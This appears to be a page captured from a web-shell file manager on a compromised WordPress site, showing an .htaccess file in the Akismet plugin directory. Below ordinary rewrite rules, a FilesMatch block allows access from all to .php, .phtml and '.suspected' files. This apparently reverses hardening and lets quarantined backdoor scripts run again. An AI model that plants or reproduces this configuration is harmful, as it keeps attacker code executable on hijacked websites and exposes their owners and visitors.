File ".htaccess"
Full path: /home/omtekel/www/wp-content/plugins/akismet/.htaccess
File size: 356 B
MIME-type: text/plain
Charset: utf-8
Download Open Edit Advanced Edit Back
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
<FilesMatch ".*\.(?i:phtml|php|suspected|PHP)$">
Order Allow,Deny
Allow from all
</FilesMatch>